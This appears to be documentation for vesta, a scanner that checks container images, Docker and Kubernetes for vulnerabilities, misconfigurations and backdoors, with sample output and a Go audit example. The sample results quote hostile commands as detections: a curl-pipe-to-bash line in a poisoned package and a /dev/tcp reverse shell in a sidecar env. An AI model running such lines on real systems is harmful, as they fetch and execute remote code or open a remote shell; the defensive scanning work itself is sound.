## Scan

Scan programs installed through the mainstream installation methods for vulnerabilities:

- apt/apt-get
- rpm
- yum
- dpkg

Scan software dependencies for vulnerabilities and for maliciously poisoned dependency packages:

- Java (Jar, War, and mainstream dependencies such as log4j)
- NodeJs (NPM, YARN)
- Python (Wheel, Poetry)
- Golang (Go binary)
- PHP (Composer, and mainstream PHP frameworks: laravel, thinkphp, wordpress, wordpress plugins, etc.)
- Rust (Rust binary)

### Docker checks
| Supported | Check Item | Description | Severity | Reference |
|---|---|---|---|---|
| ✔ | Privilege Allowed | Dangerous privileged mode | critical | Ref |
| ✔ | Capabilities | Dangerous capabilities are set | critical | Ref |
| ✔ | Volume Mount | Sensitive or dangerous directories are mounted | critical | Ref |
| ✔ | Docker Unauthorized | Port 2375 is open and unauthenticated | critical | Ref |
| ✔ | Kernel version | The current kernel version has container-escape vulnerabilities | critical | Ref |
| ✔ | Network Module | The network mode is host, or host mode combined with a specific containerd version | critical/medium | |
| ✔ | Pid Module | The pid mode is set to host | high | |
| ✔ | Docker Server version | The Docker Server version has vulnerabilities | critical/high/medium/low | |
| ✔ | Docker env password check | Whether the Docker env contains weak passwords | high/medium | |
| ✔ | Image tag check | The image has no tag or uses the default `latest` | low | |
| ✔ | Docker history | Docker layers contain unsafe commands | high/medium | |
| ✔ | Docker Backdoor | The Docker env or command contains malicious commands | critical/high | |

### Kubernetes checks
| Supported | Check Item | Description | Severity | Reference |
|---|---|---|---|---|
| ✔ | Privilege Allowed | Dangerous privileged mode | critical | Ref |
| ✔ | Capabilities | Dangerous capabilities are set | critical | Ref |
| ✔ | PV and PVC | A PV is mounted on a sensitive directory and its status is active | critical/medium | Ref |
| ✔ | RBAC | K8s permissions contain dangerous configuration | high/medium/low/warning | |
| ✔ | Kubernetes-dashboard | Checks `--enable-skip-login` and the permissions of the dashboard account | critical/high/low | Ref |
| ✔ | Kernel version | The current kernel version has container-escape vulnerabilities | critical | Ref |
| ✔ | Docker Server version (k8s version is less than v1.24) | The Docker Server version has vulnerabilities | critical/high/medium/low | |
| ✔ | Kubernetes certification expiration | A certificate expires in less than 30 days | medium | |
| ✔ | ConfigMap and Secret check | Whether a ConfigMap or Secret contains weak passwords | high/medium | |
| ✔ | PodSecurityPolicy check (k8s version under v1.25) | The PodSecurityPolicy is overly tolerant of insecure Pod configuration | high/medium/low | Ref |
| ✔ | AutoMountServiceAccountToken | The Pod mounts the service token by default | critical/high/medium/low | Ref |
| ✔ | NoResourceLimits | Resource usage (for example CPU, memory, storage) is not limited | low | Ref |
| ✔ | Job and Cronjob | A Job or CronJob has no seccomp or SELinux security policy set | low | Ref |
| ✔ | Envoy admin | Envoy admin is configured and listens on 0.0.0.0 | high/medium | Ref |
| ✔ | Cilium version | The Cilium version has vulnerabilities | critical/high/medium/low | Ref |
| ✔ | Istio configurations | The Istio version has vulnerabilities, plus Istio security configuration checks | critical/high/medium/low | Ref |
| ✔ | Kubelet 10255 and Kubectl proxy | Port 10255 is open or kubectl proxy is enabled | high/medium/low | |
| ✔ | Etcd configuration | Etcd security configuration checks | high/medium | |
| ✔ | Sidecar configurations | Sidecar security configuration checks, including the sidecar's Env | critical/high/medium/low | |
| ✔ | Pod annotation | Pod annotations contain insecure configuration | high/medium/low/warning | Ref |
| ✔ | DaemonSet | A DaemonSet contains insecure configuration | critical/high/medium/low | |
| ✔ | Backdoor | Checks whether k8s contains a backdoor | critical/high | Ref |
| ✔ | Lateral admin movement | A Pod is deliberately scheduled onto a Master node | medium/low | |

## Build and use vesta

### Build vesta

Build with `make build`, or download an executable from Releases.

### Use vesta

Check the vulnerable component versions in an image or container with vesta (an image ID, an image tag, or a file passed with `-f` all work):

```
$ ./vesta scan container -f example.tar
2022/11/29 22:50:19 Begin upgrading vulnerability database
2022/11/29 22:50:19 Vulnerability Database is already initialized
2022/11/29 22:50:19 Begin to analyze the layer
2022/11/29 22:50:35 Begin to scan the layer

Detected 216 vulnerabilities

+-----+--------------------+-----------------+------------------+-------+----------+------------------------------------------------------------------+
| 208 | python3.6 - Django | 2.2.3           | CVE-2019-14232   | 7.5   | high     | An issue was discovered                                          |
|     |                    |                 |                  |       |          | in Django 1.11.x before                                          |
|     |                    |                 |                  |       |          | 1.11.23, 2.1.x before 2.1.11,                                    |
|     |                    |                 |                  |       |          | and 2.2.x before 2.2.4. If                                       |
|     |                    |                 |                  |       |          | django.utils.text.Truncator's                                    |
|     |                    |                 |                  |       |          | chars() and words() methods                                      |
|     |                    |                 |                  |       |          | were passed the html=True                                        |
|     |                    |                 |                  |       |          | argument, t...                                                   |
+-----+                    +-----------------+------------------+-------+----------+------------------------------------------------------------------+
| 209 |                    | 2.2.3           | CVE-2019-14233   | 7.5   | high     | An issue was discovered                                          |
|     |                    |                 |                  |       |          | in Django 1.11.x before                                          |
|     |                    |                 |                  |       |          | 1.11.23, 2.1.x before 2.1.11,                                    |
|     |                    |                 |                  |       |          | and 2.2.x before 2.2.4.                                          |
|     |                    |                 |                  |       |          | Due to the behaviour of                                          |
|     |                    |                 |                  |       |          | the underlying HTMLParser,                                       |
|     |                    |                 |                  |       |          | django.utils.html.strip_tags                                     |
|     |                    |                 |                  |       |          | would be extremely...                                            |
+-----+                    +-----------------+------------------+-------+----------+------------------------------------------------------------------+
| 210 |                    | 2.2.3           | CVE-2019-14234   | 9.8   | critical | An issue was discovered in                                       |
|     |                    |                 |                  |       |          | Django 1.11.x before 1.11.23,                                    |
|     |                    |                 |                  |       |          | 2.1.x before 2.1.11, and 2.2.x                                   |
|     |                    |                 |                  |       |          | before 2.2.4. Due to an error                                    |
|     |                    |                 |                  |       |          | in shallow key transformation,                                   |
|     |                    |                 |                  |       |          | key and index lookups for                                        |
|     |                    |                 |                  |       |          | django.contrib.postgres.f...                                     |
+-----+--------------------+-----------------+------------------+-------+----------+------------------------------------------------------------------+
| 211 | python3.6 - numpy  | 1.24.2          |                  | 8.5   | high     | Malicious package is detected in                                 |
|     |                    |                 |                  |       |          | '/usr/local/lib/python3.6/site-packages/numpy/setup.py',         |
|     |                    |                 |                  |       |          | malicious command "curl https://vuln.com | bash" are             |
|     |                    |                 |                  |       |          | detected.                                                        |
+-----+--------------------+-----------------+------------------+-------+----------+------------------------------------------------------------------+
```

Check the Docker baseline configuration with vesta (this can also be run inside Docker with `make run.docker`):

```
$ ./vesta analyze docker
2022/11/29 23:06:32 Start analysing

Detected 3 vulnerabilities

+----+----------------------------+----------------+--------------------------------+----------+----------------------------------+
| ID |      CONTAINER DETAIL      |     PARAM      |             VALUE              | SEVERITY |           DESCRIPTION            |
+----+----------------------------+----------------+--------------------------------+----------+----------------------------------+
| 1  | Name: Kernel               | kernel version | 5.10.104-linuxkit              | critical | Kernel version is suffering      |
|    | ID: None                   |                |                                |          | the CVE-2022-0492 with           |
|    |                            |                |                                |          | CAP_SYS_ADMIN and v1             |
|    |                            |                |                                |          | architecture of cgroups          |
|    |                            |                |                                |          | vulnerablility, has a            |
|    |                            |                |                                |          | potential container escape.      |
+----+----------------------------+----------------+--------------------------------+----------+----------------------------------+
| 2  | Name: vesta_vuln_test      | kernel version | 5.10.104-linuxkit              | critical | Kernel version is suffering      |
|    | ID: 207cf8842b15           |                |                                |          | the Dirty Pipe vulnerablility,   |
|    |                            |                |                                |          | has a potential container        |
|    |                            |                |                                |          | escape.                          |
+----+----------------------------+----------------+--------------------------------+----------+----------------------------------+
| 3  | Name: Image Tag            | Privileged     | true                           | critical | There has a potential container  |
|    | ID: None                   |                |                                |          | escape in privileged module.     |
+----+----------------------------+----------------+--------------------------------+----------+----------------------------------+
| 4  | Name: Image Configuration  | Image History  | Image name:                    | high     | Weak password found              |
|    | ID: None                   |                | vesta_history_test:latest      |          | in command: 'echo                |
|    |                            |                | Image ID: 4bc05e1e3881         |          | 'password=test123456' >          |
|    |                            |                |                                |          | config.ini # buildkit'.          |
+----+----------------------------+----------------+--------------------------------+----------+----------------------------------+
```
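The Docker baseline checks listed above (privileged mode, dangerous capabilities, sensitive volume mounts, host network and pid namespaces, weak passwords in the container's env) can be reproduced against the JSON that `docker inspect` prints. The Go program below is an added example written for this page, not vesta's own code: the field names it reads (`HostConfig.Privileged`, `HostConfig.CapAdd`, `HostConfig.NetworkMode`, `HostConfig.PidMode`, `HostConfig.Binds`, `Config.Env`) are the real `docker inspect` ones, while the capability list, the sensitive-path list, the weak-password heuristic, the severities and the embedded sample container are assumptions constructed for illustration.

```go
package main

import (
	"encoding/json"
	"fmt"
	"regexp"
	"strings"
)

type Finding struct{ Check, Severity, Detail string } // Check is named after the Docker check table above

// inspected mirrors the subset of `docker inspect` output these checks read.
type inspected struct {
	Config     struct{ Env []string }
	HostConfig struct {
		Privileged           bool
		CapAdd, Binds        []string // Binds entries are "host:container[:opts]"
		NetworkMode, PidMode string
	}
}

var (
	// Assumed lists for illustration: capabilities that alone let a process reach outside the
	// container, and host paths whose bind mount hands the container control of the host.
	dangerousCaps  = map[string]bool{"SYS_ADMIN": true, "SYS_PTRACE": true, "SYS_MODULE": true, "DAC_READ_SEARCH": true, "NET_ADMIN": true}
	sensitivePaths = []string{"/", "/etc", "/proc", "/root", "/var/run/docker.sock"}
	// NAME=value pairs whose NAME looks like a credential; group 1 is the name, group 2 the value.
	credentialEnv = regexp.MustCompile(`(?i)^([^=]*(?:pass|pwd|secret|token)[^=]*)=(.*)$`)
)

// isWeak is a deliberately simple strength test (both values flagged in the sample output above fail it).
func isWeak(value string) bool {
	v := strings.ToLower(value)
	return len(value) < 8 || strings.Contains(v, "password") || strings.Contains(v, "123456")
}

// isSensitiveMount reports whether a bind-mount source is, or lies under, a sensitive host path.
func isSensitiveMount(src string) bool {
	for _, p := range sensitivePaths {
		if src == p || (p != "/" && strings.HasPrefix(src, p+"/")) {
			return true
		}
	}
	return false
}

// AuditContainer runs the Docker baseline checks over one inspected container.
func AuditContainer(c inspected) []Finding {
	var out []Finding
	add := func(check, sev, detail string) { out = append(out, Finding{check, sev, detail}) }
	if c.HostConfig.Privileged {
		add("PrivilegeAllowed", "critical", "container runs in privileged mode")
	}
	for _, cp := range c.HostConfig.CapAdd { // accept both "SYS_ADMIN" and "CAP_SYS_ADMIN"
		if dangerousCaps[strings.TrimPrefix(strings.ToUpper(cp), "CAP_")] {
			add("Capabilities", "critical", "dangerous capability added: "+cp)
		}
	}
	for _, b := range c.HostConfig.Binds {
		if src := strings.SplitN(b, ":", 2)[0]; isSensitiveMount(src) {
			add("VolumeMount", "critical", "sensitive host path mounted: "+src)
		}
	}
	if c.HostConfig.NetworkMode == "host" {
		add("NetworkModule", "critical", "network namespace shared with the host")
	}
	if c.HostConfig.PidMode == "host" {
		add("PidModule", "high", "pid namespace shared with the host")
	}
	for _, e := range c.Config.Env {
		if m := credentialEnv.FindStringSubmatch(e); m != nil && isWeak(m[2]) {
			add("DockerEnvPasswordCheck", "high", "weak credential in env var "+m[1])
		}
	}
	return out
}

// AuditInspectJSON parses one `docker inspect` object and audits it.
func AuditInspectJSON(raw string) ([]Finding, error) {
	var c inspected
	if err := json.Unmarshal([]byte(raw), &c); err != nil {
		return nil, err
	}
	return AuditContainer(c), nil
}

// SampleInspect is a constructed `docker inspect` excerpt, not output captured from a real host.
const SampleInspect = `{"Config": {"Env": ["PATH=/usr/local/bin:/usr/bin", "DB_PASSWORD=test123456", "API_TOKEN=Xk3r9qLm2vBn7wQp"]},
 "HostConfig": {"Privileged": false, "CapAdd": ["SYS_ADMIN", "NET_BIND_SERVICE"], "NetworkMode": "host", "PidMode": "",
                "Binds": ["/var/run/docker.sock:/var/run/docker.sock", "/srv/app/data:/data:ro"]}}`

func main() {
	findings, err := AuditInspectJSON(SampleInspect)
	if err != nil {
		panic(err)
	}
	for _, f := range findings {
		fmt.Printf("%-24s %-9s %s\n", f.Check, f.Severity, f.Detail)
	}
}
```

Run against the embedded sample, the program reports four findings: the added `SYS_ADMIN` capability, the mounted Docker socket, host networking, and the weak `DB_PASSWORD` value; the read-only `/srv/app/data` bind and the long random `API_TOKEN` pass. The mount check treats `/` specially so that every path is not flagged merely for living under the root.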
Check the Kubernetes baseline configuration with vesta:

```
2022/11/29 23:15:59 Start analysing
2022/11/29 23:15:59 Geting docker server version
2022/11/29 23:15:59 Geting kernel version

Detected 4 vulnerabilities

Pods:
+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
| ID |           POD DETAIL           |             PARAM              |             VALUE              |         TYPE          | SEVERITY |          DESCRIPTION           |
+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
| 1  | Name: vulntest | Namespace:    | sidecar name: vulntest |       | true                           | Pod                   | critical | There has a potential          |
|    | default | Status: Running      | Privileged                     |                                |                       |          | container escape in privileged |
|    | Node Name: docker-desktop      |                                |                                |                       |          | module.                        |
+    +                                +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
|    |                                | sidecar name: vulntest |       | Token: Password123456          | Sidecar EnvFrom       | high     | Sidecar envFrom ConfigMap has  |
|    |                                | env                            |                                |                       |          | found weak password:           |
|    |                                |                                |                                |                       |          | 'Password123456'.              |
+    +                                +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
|    |                                | sidecar name: sidecartest |    | MALWARE: bash -i >&            | Sidecar Env           | high     | Container 'sidecartest' finds  |
|    |                                | env                            | /dev/tcp/10.0.0.1/8080 0>&1    |                       |          | high risk content (score:      |
|    |                                |                                |                                |                       |          | 0.91 out of 1.0), which is a   |
|    |                                |                                |                                |                       |          | suspect command backdoor.      |
+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
| 2  | Name: vulntest2 | Namespace:   | sidecar name: vulntest2 |      | CAP_SYS_ADMIN                  | capabilities.add      | critical | There has a potential          |
|    | default | Status: Running      | capabilities                   |                                |                       |          | container escape in privileged |
|    | Node Name: docker-desktop      |                                |                                |                       |          | module.                        |
+    +                                +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
|    |                                | sidecar name: vulntest2 |      | true                           | kube-api-access-lcvh8 | critical | Mount service account          |
|    |                                | automountServiceAccountToken   |                                |                       |          | and key permission are         |
|    |                                |                                |                                |                       |          | given, which will cause a      |
|    |                                |                                |                                |                       |          | potential container escape.    |
|    |                                |                                |                                |                       |          | Reference clsuter Role bind:   |
|    |                                |                                |                                |                       |          | vuln-clusterrolebinding |      |
|    |                                |                                |                                |                       |          | roleBinding: vuln-rolebinding  |
+    +                                +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
|    |                                | sidecar name: vulntest2 |      | cpu                            | Pod                   | low      | CPU usage is not limited.      |
|    |                                | Resource                       |                                |                       |          |                                |
+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+

Configures:
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
| ID |            TYPEL            |             PARAM              |                         VALUE                          | SEVERITY |          DESCRIPTION           |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
| 1  | K8s version less than v1.24 | kernel version                 | 5.10.104-linuxkit                                      | critical | Kernel version is suffering    |
|    |                             |                                |                                                        |          | the CVE-2022-0185 with         |
|    |                             |                                |                                                        |          | CAP_SYS_ADMIN vulnerablility,  |
|    |                             |                                |                                                        |          | has a potential container      |
```